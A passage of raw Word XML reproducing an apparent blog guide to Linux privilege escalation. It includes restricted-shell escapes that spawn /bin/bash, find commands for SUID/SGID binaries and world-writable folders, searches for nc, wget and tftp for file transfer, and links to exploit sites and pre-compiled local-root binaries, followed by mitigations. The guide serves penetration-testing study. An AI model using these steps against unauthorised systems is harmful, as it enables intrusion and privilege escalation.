            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://www.thegeekstuff.com/2011/08/linux-var-log-files/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p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35" w:name="If.commands.are.limited..you.break.out.o"/>
      <w:bookmarkEnd w:id="35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If commands are limited, you break out of the "jail" shell?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python -c 'import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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pty;pty</w:t>
            </w:r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.spawn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("/bin/bash")'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echo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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os.system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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('/bin/bash')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/bin/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i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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36" w:name="How.are.file-systems.mounted."/>
      <w:bookmarkEnd w:id="36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How are file-systems mounted?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mount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df -h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37" w:name="Are.there.any.unmounted.file-systems."/>
      <w:bookmarkEnd w:id="37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Are there any unmounted file-systems?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fstab</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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38" w:name="What..Advanced.Linux.File.Permissions..a"/>
      <w:bookmarkEnd w:id="38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lastRenderedPageBreak/>
        <w:t>What "Advanced Linux File Permissions" are used?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Sticky bits, SUID &amp; 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5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6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7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8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9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-perm -1000 -type d 2&gt;/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.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-perm -g=s -type f 2&gt;/dev/null    # SGID (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chmod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2000) - run as the group, not the user who started it.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-perm -u=s -type f 2&gt;/dev/null    # SUID (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chmod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4000) - run as the owner, not the user who started it.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-perm -g=s -o -perm -u=s -type f 2&gt;/dev/null    # SGID or SUID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for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i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in `locate -r "bin$"`; do find $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i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\( -</w:t>
            </w:r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perm -4000 -o -perm -2000 \) -type f 2&gt;/dev/null; done    # Looks in 'common' places: /bin,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sbin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,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usr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/bin,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usr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sbin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,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usr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/local/bin,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usr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/local/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sbin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and any other *bin, for SGID or SUID (Quicker search)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# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)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-perm -g=s -o -perm -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4000 !</w:t>
            </w:r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-type l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maxdepth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3 -exec ls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ld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{} \; 2&gt;/dev/null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39" w:name="Where.can.written.to.and.executed.from.."/>
      <w:bookmarkEnd w:id="39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Where can written to and executed from?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A few 'common' places: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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shm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5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6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7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-writable -type d 2&gt;/dev/null      # world-writeable folders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-perm -222 -type d 2&gt;/dev/null     # world-writeable folders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-perm -o w -type d 2&gt;/dev/null     # world-writeable folders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-perm -o x -type d 2&gt;/dev/null     # world-executable folders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find / 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\( -</w:t>
            </w:r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perm -o w -perm -o x \) -type d 2&gt;/dev/null   # world-writeable &amp; executable folders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40" w:name="Any..problem..files...em.Word-writeable."/>
      <w:bookmarkEnd w:id="40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Any "problem" files?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Word-writeable, "nobody" files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xdev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-type d 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\( -</w:t>
            </w:r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perm -0002 -a ! -perm -1000 \) -print   # world-writeable files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dir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xdev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gram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\( -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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nouser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-o -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nogroup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\) -print   #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Noowner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files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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="Preparation..amp..Finding.Exploit.Code"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Preparation &amp; Finding Exploit Code</w:t>
      </w:r>
    </w:p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42" w:name="What.development.tools.languages.are.ins"/>
      <w:bookmarkEnd w:id="42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What development tools/languages are installed/supported?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find / -name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perl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*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-name python*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find / -name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gcc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*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-name cc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43" w:name="How.can.files.be.uploaded."/>
      <w:bookmarkEnd w:id="43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How can files be uploaded?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lastRenderedPageBreak/>
              <w:t>2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3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4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 xml:space="preserve">find / -name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wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">find / -name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nc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*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find / -name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netcat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*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find / -name </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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tftp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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*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-name ftp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44" w:name="Finding.exploit.code"/>
      <w:bookmarkEnd w:id="44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lastRenderedPageBreak/>
        <w:t>Finding exploit code</w:t>
      </w:r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11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http://www.exploit-db.com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12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http://1337day.com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13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http://www.securiteam.com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14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http://www.securityfocus.com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15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http://www.exploitsearch.net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16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http://metasploit.com/modules/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17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http://securityreason.com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18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http://seclists.org/fulldisclosure/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19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http://www.google.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p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45" w:name="Finding.more.information.regarding.the.e"/>
      <w:bookmarkEnd w:id="45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Finding more information regarding the exploit</w:t>
      </w:r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20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http://www.cvedetails.com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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://packetstormsecurity.org/files/cve/[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE]</w:t>
      </w:r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Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]</w:t>
      </w:r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Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://www.vulnview.com/cve-details.php?cvename=[CVE]</w:t>
      </w:r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46" w:name="L.Quick...Common..exploits...em.Warning."/>
      <w:bookmarkEnd w:id="46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(Quick) "Common" exploits.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Warning. Pre-compiled binaries files. Use at your own risk</w:t>
      </w:r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21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http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/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22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http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="Mitigations"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p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48" w:name="Is.any.of.the.above.information.easy.to."/>
      <w:bookmarkEnd w:id="48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Is any of the above information easy to find?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="36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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Try doing it! Setup a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> job which automates script(s) and/or 3rd party products</w:t>
      </w:r>
    </w:p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49" w:name="Is.the.system.fully.patched."/>
      <w:bookmarkEnd w:id="49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Is the system fully patched?</w:t>
      </w:r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Kernel, operating system, all applications, their plugins and web services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96257E" w:rsidRPr="0096257E" w:rsidTr="009625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17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apt-get update &amp;&amp; apt-get upgrade</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="00962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96257E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yum update</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
                <w:color w:val="93A1A1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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50" w:name="Are.services.running.with.the.minimum.le"/>
      <w:bookmarkEnd w:id="50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Are services running with the minimum level of privileges required?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="36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color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For example, do you need to run MySQL as root?</w:t>
      </w:r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51" w:name="Scripts..em.Can.any.of.this.be.automated"/>
      <w:bookmarkEnd w:id="51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Scripts </w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit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Can any of this be automated?!</w:t>
      </w:r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23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http://pentestmonkey.net/tools/unix-privesc-check/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24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http://labs.portcullis.co.uk/application/enum4linux/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25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http://bastille-linux.sourceforge.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="Other..quick..guides..amp..Links"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>Other (quick) guides &amp; Links</w:t>
      </w:r>
    </w:p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53" w:name="Enumeration"/>
      <w:bookmarkEnd w:id="53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Enumeration</w:t>
      </w:r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26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http://www.0daysecurity.com/penetration-testing/enumeration.html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27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http://www.microloft.co.uk/hacking/hacking3.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p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bookmarkStart w:id="54" w:name="Misc"/>
      <w:bookmarkEnd w:id="54"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096257E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Misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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28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http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf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29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http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf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hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="0096257E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http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html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96257E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</w:rPr>
        <w:t>Posted by g0tmi1kAug 2nd, 2011</w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0096257E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</w:rPr>
        <w:t>12:00 am </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>bypassing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0096257E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</w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>commands</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0096257E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</w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>privilege escalation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hyperlink r:id="rId34" w:tooltip="Previous Post: Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve">« </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Pentesting</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> With </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>BackTrack</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> (PWB) + Offensive Security Certified Professional (OSCP)</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId35" w:tooltip="Next Post: De-ICE.net v1.2a (1.20a) {Level 1 - Disk 3 - Version A}" w:history="1">
        <w:r w:rsidRPr="0096257E">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
            <w:color w:val="751590"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>De-ICE.net v1.2a (1.20a) {Level 1 - Disk 3 - Version A} »</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E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96257E">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2762250" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="5" name="Picture 5" descr="g0tmi1k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g0tmi1k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57E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096257E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Recent Posts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1"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DVWA - Brute Force (High Level) - Anti-CSRF Tokens</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1"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DVWA - Brute Force (Medium Level) - Time Delay</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1"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 xml:space="preserve">DVWA Brute Force (Low Level) - HTTP GET Form [Hydra, </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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Patator</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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, Burp]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1"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 xml:space="preserve">DVWA - Main Login Page - Brute Force HTTP POST Form </w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/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With</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> CSRF Tokens</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1"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Damn Vulnerable Web Application (DVWA)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:history="1"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Offensive Security Wireless Attacks (</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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WiFu</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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) + Offensive Security Wireless (OSWP)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1"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Cracking the Perimeter (CTP) + Offensive Security Certified Expert (OSCE)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:proofErr w:type="spellStart"/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pWnOS</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 2 (PHP Web Application)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:proofErr w:type="spellStart"/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pWnOS</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 2 (SQL Injection)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:history="1"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21LTR - Scene 1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1"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Stripe CTF 2.0 (Web Edition)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:proofErr w:type="spellStart"/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Kioptrix</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> - Level 4 (Local File Inclusion)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0096257E" w:rsidRPr="0096257E" w:rsidRDefault="0096257E" w:rsidP="0096257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="E0E0E0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8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</w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:proofErr w:type="spellStart"/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Kioptrix</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> - Level 4 (SQL Injection)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
